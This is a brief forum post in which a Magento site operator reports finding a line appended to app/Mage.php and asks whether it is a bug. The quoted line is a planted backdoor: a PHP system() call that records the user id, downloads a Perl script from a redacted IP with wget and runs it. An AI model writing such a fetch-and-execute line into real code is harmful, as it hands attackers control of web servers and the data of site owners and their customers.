We’ve just run into a potential security issue with an install of Magento 22.214.171.124 we have, and I’d love to get any advice or find out if anyone else has come across this issue.
So app/Mage.php had this line of code written at the end of the file:
system("id > /tmp/id;wget -q http://xxx.xxx.xxx.xxx/ppp -O /tmp/p.pl;perl /tmp/p.pl");
I’ve x’d out the IP address in question.
Could this be a bug in magento or php? Has anyone else had this issue?